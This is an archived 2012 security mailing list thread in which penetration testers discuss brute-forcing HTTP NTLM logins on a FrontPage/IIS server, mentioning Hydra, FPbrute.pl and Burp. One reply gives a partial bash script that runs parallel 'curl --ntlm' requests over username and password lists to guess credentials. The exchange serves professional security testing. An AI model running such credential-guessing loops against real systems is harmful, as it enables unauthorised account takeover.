PaulDotCom mailing list archives

Re: hydra and HTTP NTLM

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 25 May 2012 23:59:34 +0300

Back when nothing was supporting Outlook Web Access bruteforcing, I've
written a simple bash script that automated the process using "curl"... I
suggest you do the same.

"curl --ntlm" -> it will be two nested for loops, the outer iterates
through usernames, the inner iterates through passwords... then process
server's answer using multiple grep and cut to check for correct/bad
credentials using variables and "if".

The only problem with that method will be the speed(lack of), so, I have
included a simple function to make sure at least "32" instances of curl are
running at any given time

===== start of code example=====
#!/bin/bash
.....
.....
CheckCurl(){
CurlCount=$(pidof curl | wc -w)
[ $CurlCount -ge 32  ] && CheckCurl
}

echo [*] Starting...
for USER in $(cat $userList)
do
        for PASSWORD in $(cat $passList)
        do
#before running the command, we want to make sure that the running
instances of curl are not greater than 32
                CheckCurl
#note that this will save the output to a folder called "html_out", change
that or create it.
                curl --ntlm -u 'domain\ $USER:$PASSWORD' blah blah blah
blah ....... & # the ending ampersand is very important for multithreading
        done

done

===== End of code example=====

Hope that helps,
Sherif Eldeeb.

On Fri, May 25, 2012 at 11:10 PM, Robin Wood <robin () digininja org> wrote:

On 25 May 2012 16:59, Navarro, Gregory J <Gregory.J.Navarro () disney com>
wrote:

Do you know of a valid login but just not the password.  If so just fuzz

it with Burp

I have no credentials but even if I did I don't think Burp does NTLM,
for it to do it it would have to be able to work with the four way
handshake and I've not seen anywhere that that appears to be an
option. If you can point me at how to do it I'll happily try.

Robin

From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]

On Behalf Of Robin Wood

Sent: Thursday, May 24, 2012 6:08 AM
To: Tony Turner; PaulDotCom Security Weekly Mailing List
Cc: _; webappsec () securityfocus com
Subject: Re: [Pauldotcom] hydra and HTTP NTLM

On 24 May 2012 13:36, Tony Turner <tony_l_turner () yahoo com> wrote:

Have you tried http://www.foofus.net/~jmk/tools/FPbrute.pl yet? Or is

there

a reason you wanted to use Hydra?


I've tried that but it seems to expect the login request for a simple
GET. I'm testing a FrontPage install which allows me to read but then
fails on write. Checking the traffic when I click save it sends an
OPTIONS request which gets a reply of 401 which triggers FP to then
start the handshake.

Robin

________________________________
From: Robin Wood <robin () digininja org>
To: _ <packetnull () gmail com>
Cc: "webappsec () securityfocus com" <webappsec () securityfocus com>;

PaulDotCom

Mailing List <pauldotcom () mail pauldotcom com>
Sent: Thursday, May 24, 2012 8:17 AM
Subject: Re: [Pauldotcom] hydra and HTTP NTLM

On 24 May 2012 13:06, _ <packetnull () gmail com> wrote:

http ntlm is IIS based windows auth.


Yes but I still don't know how to attack it.

Robin

On May 23, 2012, at 6:14 AM, Robin Wood <robin () digininja org> wrote:

Anyone know how to use the new HTTP NTLM feature in Hydra? I'm trying
to brute force a MS Front Page login which only asks for
authentication when the OPTIONS method is used as far as I can tell.

Robin



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com



_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com




This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

hydra and HTTP NTLM Robin Wood (May 23)
- Message not available
  - Re: hydra and HTTP NTLM Robin Wood (May 24)
    - Re: hydra and HTTP NTLM Tony Turner (May 24)
    - Re: hydra and HTTP NTLM Robin Wood (May 24)
    - Message not available
    - Re: hydra and HTTP NTLM Robin Wood (May 25)
    - Re: hydra and HTTP NTLM Sherif El-Deeb (May 25)
    - Re: hydra and HTTP NTLM Robin Wood (May 26)
    - Re: hydra and HTTP NTLM Robert Wahl (May 25)
- Re: hydra and HTTP NTLM Security Auditor (May 25)
  - Re: hydra and HTTP NTLM Robin Wood (May 25)
    - Message not available
    - Re: hydra and HTTP NTLM Robin Wood (May 27)